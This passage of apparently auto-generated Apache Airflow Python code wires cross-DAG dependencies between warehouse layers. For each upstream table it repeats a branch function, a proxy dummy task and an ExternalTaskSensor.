execution_date_fn=sqlg_exec_date_fn
)
BRANCH_D_SDM_PRDxD_SDM_SCM__SDM_ORG_HIER.set_downstream(proxy_D_SDM_PRDxD_SDM_SCM__SDM_ORG_HIER)
BRANCH_D_SDM_PRDxD_SDM_SCM__SDM_ORG_HIER.set_downstream(D_SDM_PRDxD_SDM_SCM__SDM_ORG_HIER)
D_SDM_PRDxD_SDM_SCM__SDM_ORG_HIER.set_downstream(proxy_D_SDM_PRDxD_SDM_SCM__SDM_ORG_HIER)
def branch_D_SDM_PRDxD_ODS_PRD_SRC__MV_PROJECT_ACTIVITY_V(**context):
mydag = context["dag"]
dagbag = DagBag()
upstream = dagbag.get_dag("D_ODS_PRD_SRC")
# print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
# print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
up_sch_interval = std_interval.get(upstream.schedule_interval)
my_sch_interval = std_interval.get(mydag.schedule_interval)
if up_sch_interval is None or my_sch_interval is None:
if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
return ["proxy_D_SDM_PRDxD_ODS_PRD_SRC__MV_PROJECT_ACTIVITY_V","D_SDM_PRDxD_ODS_PRD_SRC__MV_PROJECT_ACTIVITY_V"]
elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
if upstream.latest_execution_date == context["execution_date"]:
return ["proxy_D_SDM_PRDxD_ODS_PRD_SRC__MV_PROJECT_ACTIVITY_V","D_SDM_PRDxD_ODS_PRD_SRC__MV_PROJECT_ACTIVITY_V"]
return ["proxy_D_SDM_PRDxD_ODS_PRD_SRC__MV_PROJECT_ACTIVITY_V"]
my_taskid = "BRANCH_D_SDM_PRDxD_ODS_PRD_SRC__MV_PROJECT_ACTIVITY_V"
BRANCH_D_SDM_PRDxD_ODS_PRD_SRC__MV_PROJECT_ACTIVITY_V= BranchPythonOperator(
task_id=my_taskid,
python_callable=branch_D_SDM_PRDxD_ODS_PRD_SRC__MV_PROJECT_ACTIVITY_V,
dag=D_SDM_PRD,
provide_context=True,
)
my_taskid = "proxy_D_SDM_PRDxD_ODS_PRD_SRC__MV_PROJECT_ACTIVITY_V"
proxy_D_SDM_PRDxD_ODS_PRD_SRC__MV_PROJECT_ACTIVITY_V= DummyOperator(
task_id=my_taskid,
trigger_rule="none_failed_or_skipped",
dag=D_SDM_PRD,
)
# Cross dag sensor
my_taskid = "D_SDM_PRDxD_ODS_PRD_SRC__MV_PROJECT_ACTIVITY_V"
D_SDM_PRDxD_ODS_PRD_SRC__MV_PROJECT_ACTIVITY_V= ExternalTaskSensor(
pool = "sensor_pool",
task_id=my_taskid,
external_dag_id="D_ODS_PRD_SRC",
external_task_id="MV_PROJECT_ACTIVITY_V",
mode="reschedule",
dag=D_SDM_PRD,
check_existence=True,
timeout=60*60*1,
retries=5,
retry_delay=timedelta(minutes=3),
execution_date_fn=sqlg_exec_date_fn
)
BRANCH_D_SDM_PRDxD_ODS_PRD_SRC__MV_PROJECT_ACTIVITY_V.set_downstream(proxy_D_SDM_PRDxD_ODS_PRD_SRC__MV_PROJECT_ACTIVITY_V)
BRANCH_D_SDM_PRDxD_ODS_PRD_SRC__MV_PROJECT_ACTIVITY_V.set_downstream(D_SDM_PRDxD_ODS_PRD_SRC__MV_PROJECT_ACTIVITY_V)
D_SDM_PRDxD_ODS_PRD_SRC__MV_PROJECT_ACTIVITY_V.set_downstream(proxy_D_SDM_PRDxD_ODS_PRD_SRC__MV_PROJECT_ACTIVITY_V)
def branch_D_DM_PRDxD_SDM_PRD__SDM_PROD_DEV_MLST_DELAY_RATE(**context):
mydag = context["dag"]
dagbag = DagBag()
upstream = dagbag.get_dag("D_SDM_PRD")
# print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
# print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
up_sch_interval = std_interval.get(upstream.schedule_interval)
my_sch_interval = std_interval.get(mydag.schedule_interval)
if up_sch_interval is None or my_sch_interval is None:
if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
return ["proxy_D_DM_PRDxD_SDM_PRD__SDM_PROD_DEV_MLST_DELAY_RATE","D_DM_PRDxD_SDM_PRD__SDM_PROD_DEV_MLST_DELAY_RATE"]
elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
if upstream.latest_execution_date == context["execution_date"]:
return ["proxy_D_DM_PRDxD_SDM_PRD__SDM_PROD_DEV_MLST_DELAY_RATE","D_DM_PRDxD_SDM_PRD__SDM_PROD_DEV_MLST_DELAY_RATE"]
return ["proxy_D_DM_PRDxD_SDM_PRD__SDM_PROD_DEV_MLST_DELAY_RATE"]
my_taskid = "BRANCH_D_DM_PRDxD_SDM_PRD__SDM_PROD_DEV_MLST_DELAY_RATE"
BRANCH_D_DM_PRDxD_SDM_PRD__SDM_PROD_DEV_MLST_DELAY_RATE= BranchPythonOperator(
task_id=my_taskid,
python_callable=branch_D_DM_PRDxD_SDM_PRD__SDM_PROD_DEV_MLST_DELAY_RATE,
dag=D_DM_PRD,
provide_context=True,
)
my_taskid = "proxy_D_DM_PRDxD_SDM_PRD__SDM_PROD_DEV_MLST_DELAY_RATE"
proxy_D_DM_PRDxD_SDM_PRD__SDM_PROD_DEV_MLST_DELAY_RATE= DummyOperator(
task_id=my_taskid,
trigger_rule="none_failed_or_skipped",
dag=D_DM_PRD,
)
# Cross dag sensor
my_taskid = "D_DM_PRDxD_SDM_PRD__SDM_PROD_DEV_MLST_DELAY_RATE"
D_DM_PRDxD_SDM_PRD__SDM_PROD_DEV_MLST_DELAY_RATE= ExternalTaskSensor(
pool = "sensor_pool",
task_id=my_taskid,
external_dag_id="D_SDM_PRD",
external_task_id="SDM_PROD_DEV_MLST_DELAY_RATE",
mode="reschedule",
dag=D_DM_PRD,
check_existence=True,
timeout=60*60*1,
retries=5,
retry_delay=timedelta(minutes=3),
execution_date_fn=sqlg_exec_date_fn
)
BRANCH_D_DM_PRDxD_SDM_PRD__SDM_PROD_DEV_MLST_DELAY_RATE.set_downstream(proxy_D_DM_PRDxD_SDM_PRD__SDM_PROD_DEV_MLST_DELAY_RATE)
BRANCH_D_DM_PRDxD_SDM_PRD__SDM_PROD_DEV_MLST_DELAY_RATE.set_downstream(D_DM_PRDxD_SDM_PRD__SDM_PROD_DEV_MLST_DELAY_RATE)
D_DM_PRDxD_SDM_PRD__SDM_PROD_DEV_MLST_DELAY_RATE.set_downstream(proxy_D_DM_PRDxD_SDM_PRD__SDM_PROD_DEV_MLST_DELAY_RATE)
def branch_D_DM_PRDxD_SDM_PRD__SDM_CDOC_PLANNED_DEV_TIME(**context):
mydag = context["dag"]
dagbag = DagBag()
upstream = dagbag.get_dag("D_SDM_PRD")
# print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
# print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
up_sch_interval = std_interval.get(upstream.schedule_interval)
my_sch_interval = std_interval.get(mydag.schedule_interval)
if up_sch_interval is None or my_sch_interval is None:
if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
return ["proxy_D_DM_PRDxD_SDM_PRD__SDM_CDOC_PLANNED_DEV_TIME","D_DM_PRDxD_SDM_PRD__SDM_CDOC_PLANNED_DEV_TIME"]
elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
if upstream.latest_execution_date == context["execution_date"]:
return ["proxy_D_DM_PRDxD_SDM_PRD__SDM_CDOC_PLANNED_DEV_TIME","D_DM_PRDxD_SDM_PRD__SDM_CDOC_PLANNED_DEV_TIME"]
return ["proxy_D_DM_PRDxD_SDM_PRD__SDM_CDOC_PLANNED_DEV_TIME"]
my_taskid = "BRANCH_D_DM_PRDxD_SDM_PRD__SDM_CDOC_PLANNED_DEV_TIME"
BRANCH_D_DM_PRDxD_SDM_PRD__SDM_CDOC_PLANNED_DEV_TIME= BranchPythonOperator(
task_id=my_taskid,
python_callable=branch_D_DM_PRDxD_SDM_PRD__SDM_CDOC_PLANNED_DEV_TIME,
dag=D_DM_PRD,
provide_context=True,
)
my_taskid = "proxy_D_DM_PRDxD_SDM_PRD__SDM_CDOC_PLANNED_DEV_TIME"
proxy_D_DM_PRDxD_SDM_PRD__SDM_CDOC_PLANNED_DEV_TIME= DummyOperator(
task_id=my_taskid,
trigger_rule="none_failed_or_skipped",
dag=D_DM_PRD,
)
# Cross dag sensor
my_taskid = "D_DM_PRDxD_SDM_PRD__SDM_CDOC_PLANNED_DEV_TIME"
D_DM_PRDxD_SDM_PRD__SDM_CDOC_PLANNED_DEV_TIME= ExternalTaskSensor(
pool = "sensor_pool",
task_id=my_taskid,
external_dag_id="D_SDM_PRD",
external_task_id="SDM_CDOC_PLANNED_DEV_TIME",
mode="reschedule",
dag=D_DM_PRD,
check_existence=True,
timeout=60*60*1,
retries=5,
retry_delay=timedelta(minutes=3),
execution_date_fn=sqlg_exec_date_fn
)
BRANCH_D_DM_PRDxD_SDM_PRD__SDM_CDOC_PLANNED_DEV_TIME.set_downstream(proxy_D_DM_PRDxD_SDM_PRD__SDM_CDOC_PLANNED_DEV_TIME)
BRANCH_D_DM_PRDxD_SDM_PRD__SDM_CDOC_PLANNED_DEV_TIME.set_downstream(D_DM_PRDxD_SDM_PRD__SDM_CDOC_PLANNED_DEV_TIME)
D_DM_PRDxD_SDM_PRD__SDM_CDOC_PLANNED_DEV_TIME.set_downstream(proxy_D_DM_PRDxD_SDM_PRD__SDM_CDOC_PLANNED_DEV_TIME)
def branch_D_DM_PRDxD_SDM_PRD__SDM_CDOC_DELAY_TIME(**context):
mydag = context["dag"]
dagbag = DagBag()
upstream = dagbag.get_dag("D_SDM_PRD")
# print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
# print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
up_sch_interval = std_interval.get(upstream.schedule_interval)
my_sch_interval = std_interval.get(mydag.schedule_interval)
if up_sch_interval is None or my_sch_interval is None:
if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
return ["proxy_D_DM_PRDxD_SDM_PRD__SDM_CDOC_DELAY_TIME","D_DM_PRDxD_SDM_PRD__SDM_CDOC_DELAY_TIME"]
elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
if upstream.latest_execution_date == context["execution_date"]:
return ["proxy_D_DM_PRDxD_SDM_PRD__SDM_CDOC_DELAY_TIME","D_DM_PRDxD_SDM_PRD__SDM_CDOC_DELAY_TIME"]
return ["proxy_D_DM_PRDxD_SDM_PRD__SDM_CDOC_DELAY_TIME"]
my_taskid = "BRANCH_D_DM_PRDxD_SDM_PRD__SDM_CDOC_DELAY_TIME"
BRANCH_D_DM_PRDxD_SDM_PRD__SDM_CDOC_DELAY_TIME= BranchPythonOperator(
task_id=my_taskid,
python_callable=branch_D_DM_PRDxD_SDM_PRD__SDM_CDOC_DELAY_TIME,
dag=D_DM_PRD,
provide_context=True,
)
my_taskid = "proxy_D_DM_PRDxD_SDM_PRD__SDM_CDOC_DELAY_TIME"
proxy_D_DM_PRDxD_SDM_PRD__SDM_CDOC_DELAY_TIME= DummyOperator(
task_id=my_taskid,
trigger_rule="none_failed_or_skipped",
dag=D_DM_PRD,
)
# Cross dag sensor
my_taskid = "D_DM_PRDxD_SDM_PRD__SDM_CDOC_DELAY_TIME"
D_DM_PRDxD_SDM_PRD__SDM_CDOC_DELAY_TIME= ExternalTaskSensor(
pool = "sensor_pool",
task_id=my_taskid,
external_dag_id="D_SDM_PRD",
external_task_id="SDM_CDOC_DELAY_TIME",
mode="reschedule",
dag=D_DM_PRD,
check_existence=True,
timeout=60*60*1,
retries=5,
retry_delay=timedelta(minutes=3),
execution_date_fn=sqlg_exec_date_fn
)
BRANCH_D_DM_PRDxD_SDM_PRD__SDM_CDOC_DELAY_TIME.set_downstream(proxy_D_DM_PRDxD_SDM_PRD__SDM_CDOC_DELAY_TIME)
BRANCH_D_DM_PRDxD_SDM_PRD__SDM_CDOC_DELAY_TIME.set_downstream(D_DM_PRDxD_SDM_PRD__SDM_CDOC_DELAY_TIME)
D_DM_PRDxD_SDM_PRD__SDM_CDOC_DELAY_TIME.set_downstream(proxy_D_DM_PRDxD_SDM_PRD__SDM_CDOC_DELAY_TIME)
def branch_D_DM_PRDxD_SDM_PRD__SDM_ECN_CASE_AFTER_MP(**context):
mydag = context["dag"]
dagbag = DagBag()
upstream = dagbag.get_dag("D_SDM_PRD")
# print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
# print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
up_sch_interval = std_interval.get(upstream.schedule_interval)
my_sch_interval = std_interval.get(mydag.schedule_interval)
if up_sch_interval is None or my_sch_interval is None:
if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
return ["proxy_D_DM_PRDxD_SDM_PRD__SDM_ECN_CASE_AFTER_MP","D_DM_PRDxD_SDM_PRD__SDM_ECN_CASE_AFTER_MP"]
elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
if upstream.latest_execution_date == context["execution_date"]:
return ["proxy_D_DM_PRDxD_SDM_PRD__SDM_ECN_CASE_AFTER_MP","D_DM_PRDxD_SDM_PRD__SDM_ECN_CASE_AFTER_MP"]
return ["proxy_D_DM_PRDxD_SDM_PRD__SDM_ECN_CASE_AFTER_MP"]
my_taskid = "BRANCH_D_DM_PRDxD_SDM_PRD__SDM_ECN_CASE_AFTER_MP"
BRANCH_D_DM_PRDxD_SDM_PRD__SDM_ECN_CASE_AFTER_MP= BranchPythonOperator(
task_id=my_taskid,
python_callable=branch_D_DM_PRDxD_SDM_PRD__SDM_ECN_CASE_AFTER_MP,
dag=D_DM_PRD,
provide_context=True,
)
my_taskid = "proxy_D_DM_PRDxD_SDM_PRD__SDM_ECN_CASE_AFTER_MP"
proxy_D_DM_PRDxD_SDM_PRD__SDM_ECN_CASE_AFTER_MP= DummyOperator(
task_id=my_taskid,
trigger_rule="none_failed_or_skipped",
dag=D_DM_PRD,
)
# Cross dag sensor
my_taskid = "D_DM_PRDxD_SDM_PRD__SDM_ECN_CASE_AFTER_MP"
D_DM_PRDxD_SDM_PRD__SDM_ECN_CASE_AFTER_MP= ExternalTaskSensor(
pool = "sensor_pool",
task_id=my_taskid,
external_dag_id="D_SDM_PRD",
external_task_id="SDM_ECN_CASE_AFTER_MP",
mode="reschedule",
dag=D_DM_PRD,
check_existence=True,
timeout=60*60*1,
retries=5,
retry_delay=timedelta(minutes=3),
execution_date_fn=sqlg_exec_date_fn
)
BRANCH_D_DM_PRDxD_SDM_PRD__SDM_ECN_CASE_AFTER_MP.set_downstream(proxy_D_DM_PRDxD_SDM_PRD__SDM_ECN_CASE_AFTER_MP)
BRANCH_D_DM_PRDxD_SDM_PRD__SDM_ECN_CASE_AFTER_MP.set_downstream(D_DM_PRDxD_SDM_PRD__SDM_ECN_CASE_AFTER_MP)
D_DM_PRDxD_SDM_PRD__SDM_ECN_CASE_AFTER_MP.set_downstream(proxy_D_DM_PRDxD_SDM_PRD__SDM_ECN_CASE_AFTER_MP)
def branch_D_DM_PRDxD_SDM_PRD__SDM_EPR_MFG_CONVERSION_COST(**context):
mydag = context["dag"]
dagbag = DagBag()
upstream = dagbag.get_dag("D_SDM_PRD")
# print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
# print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
up_sch_interval = std_interval.get(upstream.schedule_interval)
my_sch_interval = std_interval.get(mydag.schedule_interval)
if up_sch_interval is None or my_sch_interval is None:
if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
return ["proxy_D_DM_PRDxD_SDM_PRD__SDM_EPR_MFG_CONVERSION_COST","D_DM_PRDxD_SDM_PRD__SDM_EPR_MFG_CONVERSION_COST"]
elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
if upstream.latest_execution_date == context["execution_date"]:
return ["proxy_D_DM_PRDxD_SDM_PRD__SDM_EPR_MFG_CONVERSION_COST","D_DM_PRDxD_SDM_PRD__SDM_EPR_MFG_CONVERSION_COST"]
return ["proxy_D_DM_PRDxD_SDM_PRD__SDM_EPR_MFG_CONVERSION_COST"]
my_taskid = "BRANCH_D_DM_PRDxD_SDM_PRD__SDM_EPR_MFG_CONVERSION_COST"
BRANCH_D_DM_PRDxD_SDM_PRD__SDM_EPR_MFG_CONVERSION_COST= BranchPythonOperator(
task_id=my_taskid,
python_callable=branch_D_DM_PRDxD_SDM_PRD__SDM_EPR_MFG_CONVERSION_COST,
dag=D_DM_PRD,
provide_context=True,
)
my_taskid = "proxy_D_DM_PRDxD_SDM_PRD__SDM_EPR_MFG_CONVERSION_COST"
proxy_D_DM_PRDxD_SDM_PRD__SDM_EPR_MFG_CONVERSION_COST= DummyOperator(
task_id=my_taskid,
trigger_rule="none_failed_or_skipped",
dag=D_DM_PRD,
)
# Cross dag sensor
my_taskid = "D_DM_PRDxD_SDM_PRD__SDM_EPR_MFG_CONVERSION_COST"
D_DM_PRDxD_SDM_PRD__SDM_EPR_MFG_CONVERSION_COST= ExternalTaskSensor(
pool = "sensor_pool",
task_id=my_taskid,
external_dag_id="D_SDM_PRD",
external_task_id="SDM_EPR_MFG_CONVERSION_COST",
mode="reschedule",
dag=D_DM_PRD,
check_existence=True,
timeout=60*60*1,
retries=5,
retry_delay=timedelta(minutes=3),
execution_date_fn=sqlg_exec_date_fn
)
BRANCH_D_DM_PRDxD_SDM_PRD__SDM_EPR_MFG_CONVERSION_COST.set_downstream(proxy_D_DM_PRDxD_SDM_PRD__SDM_EPR_MFG_CONVERSION_COST)
BRANCH_D_DM_PRDxD_SDM_PRD__SDM_EPR_MFG_CONVERSION_COST.set_downstream(D_DM_PRDxD_SDM_PRD__SDM_EPR_MFG_CONVERSION_COST)
D_DM_PRDxD_SDM_PRD__SDM_EPR_MFG_CONVERSION_COST.set_downstream(proxy_D_DM_PRDxD_SDM_PRD__SDM_EPR_MFG_CONVERSION_COST)
def branch_D_DM_PRDxD_SDM_PRD__SDM_TOOLING_TOTAL_EXPENSE(**context):
mydag = context["dag"]
dagbag = DagBag()
upstream = dagbag.get_dag("D_SDM_PRD")
# print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
# print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
up_sch_interval = std_interval.get(upstream.schedule_interval)
my_sch_interval = std_interval.get(mydag.schedule_interval)
if up_sch_interval is None or my_sch_interval is None:
if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
return ["proxy_D_DM_PRDxD_SDM_PRD__SDM_TOOLING_TOTAL_EXPENSE","D_DM_PRDxD_SDM_PRD__SDM_TOOLING_TOTAL_EXPENSE"]
elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
if upstream.latest_execution_date == context["execution_date"]:
return ["proxy_D_DM_PRDxD_SDM_PRD__SDM_TOOLING_TOTAL_EXPENSE","D_DM_PRDxD_SDM_PRD__SDM_TOOLING_TOTAL_EXPENSE"]
return ["proxy_D_DM_PRDxD_SDM_PRD__SDM_TOOLING_TOTAL_EXPENSE"]
my_taskid = "BRANCH_D_DM_PRDxD_SDM_PRD__SDM_TOOLING_TOTAL_EXPENSE"
BRANCH_D_DM_PRDxD_SDM_PRD__SDM_TOOLING_TOTAL_EXPENSE= BranchPythonOperator(
task_id=my_taskid,
python_callable=branch_D_DM_PRDxD_SDM_PRD__SDM_TOOLING_TOTAL_EXPENSE,
dag=D_DM_PRD,
provide_context=True,
)
my_taskid = "proxy_D_DM_PRDxD_SDM_PRD__SDM_TOOLING_TOTAL_EXPENSE"
proxy_D_DM_PRDxD_SDM_PRD__SDM_TOOLING_TOTAL_EXPENSE= DummyOperator(
task_id=my_taskid,
trigger_rule="none_failed_or_skipped",
dag=D_DM_PRD,
)
# Cross dag sensor
my_taskid = "D_DM_PRDxD_SDM_PRD__SDM_TOOLING_TOTAL_EXPENSE"
D_DM_PRDxD_SDM_PRD__SDM_TOOLING_TOTAL_EXPENSE= ExternalTaskSensor(
pool = "sensor_pool",
task_id=my_taskid,
external_dag_id="D_SDM_PRD",
external_task_id="SDM_TOOLING_TOTAL_EXPENSE",
mode="reschedule",
dag=D_DM_PRD,
check_existence=True,
timeout=60*60*1,
retries=5,
retry_delay=timedelta(minutes=3),
execution_date_fn=sqlg_exec_date_fn
)
BRANCH_D_DM_PRDxD_SDM_PRD__SDM_TOOLING_TOTAL_EXPENSE.set_downstream(proxy_D_DM_PRDxD_SDM_PRD__SDM_TOOLING_TOTAL_EXPENSE)
BRANCH_D_DM_PRDxD_SDM_PRD__SDM_TOOLING_TOTAL_EXPENSE.set_downstream(D_DM_PRDxD_SDM_PRD__SDM_TOOLING_TOTAL_EXPENSE)
D_DM_PRDxD_SDM_PRD__SDM_TOOLING_TOTAL_EXPENSE.set_downstream(proxy_D_DM_PRDxD_SDM_PRD__SDM_TOOLING_TOTAL_EXPENSE)
def branch_D_DM_PRDxD_SDM_PRD__SDM_DMST_AND_INTL_TRAVEL_EXP(**context):
mydag = context["dag"]
dagbag = DagBag()
upstream = dagbag.get_dag("D_SDM_PRD")
# print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
# print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
up_sch_interval = std_interval.get(upstream.schedule_interval)
my_sch_interval = std_interval.get(mydag.schedule_interval)
if up_sch_interval is None or my_sch_interval is None:
if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
return ["proxy_D_DM_PRDxD_SDM_PRD__SDM_DMST_AND_INTL_TRAVEL_EXP","D_DM_PRDxD_SDM_PRD__SDM_DMST_AND_INTL_TRAVEL_EXP"]
elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
if upstream.latest_execution_date == context["execution_date"]:
return ["proxy_D_DM_PRDxD_SDM_PRD__SDM_DMST_AND_INTL_TRAVEL_EXP","D_DM_PRDxD_SDM_PRD__SDM_DMST_AND_INTL_TRAVEL_EXP"]
return ["proxy_D_DM_PRDxD_SDM_PRD__SDM_DMST_AND_INTL_TRAVEL_EXP"]
my_taskid = "BRANCH_D_DM_PRDxD_SDM_PRD__SDM_DMST_AND_INTL_TRAVEL_EXP"
BRANCH_D_DM_PRDxD_SDM_PRD__SDM_DMST_AND_INTL_TRAVEL_EXP= BranchPythonOperator(
task_id=my_taskid,
python_callable=branch_D_DM_PRDxD_SDM_PRD__SDM_DMST_AND_INTL_TRAVEL_EXP,
dag=D_DM_PRD,
provide_context=True,
)
my_taskid = "proxy_D_DM_PRDxD_SDM_PRD__SDM_DMST_AND_INTL_TRAVEL_EXP"
proxy_D_DM_PRDxD_SDM_PRD__SDM_DMST_AND_INTL_TRAVEL_EXP= DummyOperator(
task_id=my_taskid,
trigger_rule="none_failed_or_skipped",
dag=D_DM_PRD,
)
# Cross dag sensor
my_taskid = "D_DM_PRDxD_SDM_PRD__SDM_DMST_AND_INTL_TRAVEL_EXP"
D_DM_PRDxD_SDM_PRD__SDM_DMST_AND_INTL_TRAVEL_EXP= ExternalTaskSensor(
pool = "sensor_pool",
task_id=my_taskid,
external_dag_id="D_SDM_PRD",
external_task_id="SDM_DMST_AND_INTL_TRAVEL_EXP",
mode="reschedule",
dag=D_DM_PRD,
check_existence=True,
timeout=60*60*1,
retries=5,
retry_delay=timedelta(minutes=3),
execution_date_fn=sqlg_exec_date_fn
)
BRANCH_D_DM_PRDxD_SDM_PRD__SDM_DMST_AND_INTL_TRAVEL_EXP.set_downstream(proxy_D_DM_PRDxD_SDM_PRD__SDM_DMST_AND_INTL_TRAVEL_EXP)
BRANCH_D_DM_PRDxD_SDM_PRD__SDM_DMST_AND_INTL_TRAVEL_EXP.set_downstream(D_DM_PRDxD_SDM_PRD__SDM_DMST_AND_INTL_TRAVEL_EXP)
D_DM_PRDxD_SDM_PRD__SDM_DMST_AND_INTL_TRAVEL_EXP.set_downstream(proxy_D_DM_PRDxD_SDM_PRD__SDM_DMST_AND_INTL_TRAVEL_EXP)
def branch_D_DM_PRDxD_STG_INIT__SYS_STS_STG(**context):
mydag = context["dag"]
dagbag = DagBag()
upstream = dagbag.get_dag("D_STG_INIT")
# print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
# print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
up_sch_interval = std_interval.get(upstream.schedule_interval)
my_sch_interval = std_interval.get(mydag.schedule_interval)
if up_sch_interval is None or my_sch_interval is None:
if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
return ["proxy_D_DM_PRDxD_STG_INIT__SYS_STS_STG","D_DM_PRDxD_STG_INIT__SYS_STS_STG"]
elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
if upstream.latest_execution_date == context["execution_date"]:
return ["proxy_D_DM_PRDxD_STG_INIT__SYS_STS_STG","D_DM_PRDxD_STG_INIT__SYS_STS_STG"]
return ["proxy_D_DM_PRDxD_STG_INIT__SYS_STS_STG"]
my_taskid = "BRANCH_D_DM_PRDxD_STG_INIT__SYS_STS_STG"
BRANCH_D_DM_PRDxD_STG_INIT__SYS_STS_STG= BranchPythonOperator(
task_id=my_taskid,
python_callable=branch_D_DM_PRDxD_STG_INIT__SYS_STS_STG,
dag=D_DM_PRD,
provide_context=True,
)
my_taskid = "proxy_D_DM_PRDxD_STG_INIT__SYS_STS_STG"
proxy_D_DM_PRDxD_STG_INIT__SYS_STS_STG= DummyOperator(
task_id=my_taskid,
trigger_rule="none_failed_or_skipped",
dag=D_DM_PRD,
)
# Cross dag sensor
my_taskid = "D_DM_PRDxD_STG_INIT__SYS_STS_STG"
D_DM_PRDxD_STG_INIT__SYS_STS_STG= ExternalTaskSensor(
pool = "sensor_pool",
task_id=my_taskid,
external_dag_id="D_STG_INIT",
external_task_id="SYS_STS_STG",
mode="reschedule",
dag=D_DM_PRD,
check_existence=True,
timeout=60*60*1,
retries=5,
retry_delay=timedelta(minutes=3),
execution_date_fn=sqlg_exec_date_fn
)
BRANCH_D_DM_PRDxD_STG_INIT__SYS_STS_STG.set_downstream(proxy_D_DM_PRDxD_STG_INIT__SYS_STS_STG)
BRANCH_D_DM_PRDxD_STG_INIT__SYS_STS_STG.set_downstream(D_DM_PRDxD_STG_INIT__SYS_STS_STG)
D_DM_PRDxD_STG_INIT__SYS_STS_STG.set_downstream(proxy_D_DM_PRDxD_STG_INIT__SYS_STS_STG)
def branch_D_DM_PRDxD_SDM_PRD__SDM_TESTING_EXPENSE(**context):
mydag = context["dag"]
dagbag = DagBag()
upstream = dagbag.get_dag("D_SDM_PRD")
# print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
# print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
up_sch_interval = std_interval.get(upstream.schedule_interval)
my_sch_interval = std_interval.get(mydag.schedule_interval)
if up_sch_interval is None or my_sch_interval is None:
if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
return ["proxy_D_DM_PRDxD_SDM_PRD__SDM_TESTING_EXPENSE","D_DM_PRDxD_SDM_PRD__SDM_TESTING_EXPENSE"]
elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
if upstream.latest_execution_date == context["execution_date"]:
return ["proxy_D_DM_PRDxD_SDM_PRD__SDM_TESTING_EXPENSE","D_DM_PRDxD_SDM_PRD__SDM_TESTING_EXPENSE"]
return ["proxy_D_DM_PRDxD_SDM_PRD__SDM_TESTING_EXPENSE"]
my_taskid = "BRANCH_D_DM_PRDxD_SDM_PRD__SDM_TESTING_EXPENSE"
BRANCH_D_DM_PRDxD_SDM_PRD__SDM_TESTING_EXPENSE= BranchPythonOperator(
task_id=my_taskid,
python_callable=branch_D_DM_PRDxD_SDM_PRD__SDM_TESTING_EXPENSE,
dag=D_DM_PRD,
provide_context=True,
)
my_taskid = "proxy_D_DM_PRDxD_SDM_PRD__SDM_TESTING_EXPENSE"
proxy_D_DM_PRDxD_SDM_PRD__SDM_TESTING_EXPENSE= DummyOperator(
task_id=my_taskid,
trigger_rule="none_failed_or_skipped",
dag=D_DM_PRD,
)
# Cross dag sensor
my_taskid = "D_DM_PRDxD_SDM_PRD__SDM_TESTING_EXPENSE"
D_DM_PRDxD_SDM_PRD__SDM_TESTING_EXPENSE= ExternalTaskSensor(
pool = "sensor_pool",
task_id=my_taskid,
external_dag_id="D_SDM_PRD",
external_task_id="SDM_TESTING_EXPENSE",
mode="reschedule",
dag=D_DM_PRD,
check_existence=True,
timeout=60*60*1,
retries=5,
retry_delay=timedelta(minutes=3),
execution_date_fn=sqlg_exec_date_fn
)
BRANCH_D_DM_PRDxD_SDM_PRD__SDM_TESTING_EXPENSE.set_downstream(proxy_D_DM_PRDxD_SDM_PRD__SDM_TESTING_EXPENSE)
BRANCH_D_DM_PRDxD_SDM_PRD__SDM_TESTING_EXPENSE.set_downstream(D_DM_PRDxD_SDM_PRD__SDM_TESTING_EXPENSE)
D_DM_PRDxD_SDM_PRD__SDM_TESTING_EXPENSE.set_downstream(proxy_D_DM_PRDxD_SDM_PRD__SDM_TESTING_EXPENSE)
def branch_D_DM_PRDxD_SDM_PRD__SDM_EQT_EXPENSE(**context):
mydag = context["dag"]
dagbag = DagBag()
upstream = dagbag.get_dag("D_SDM_PRD")
# print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
# print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
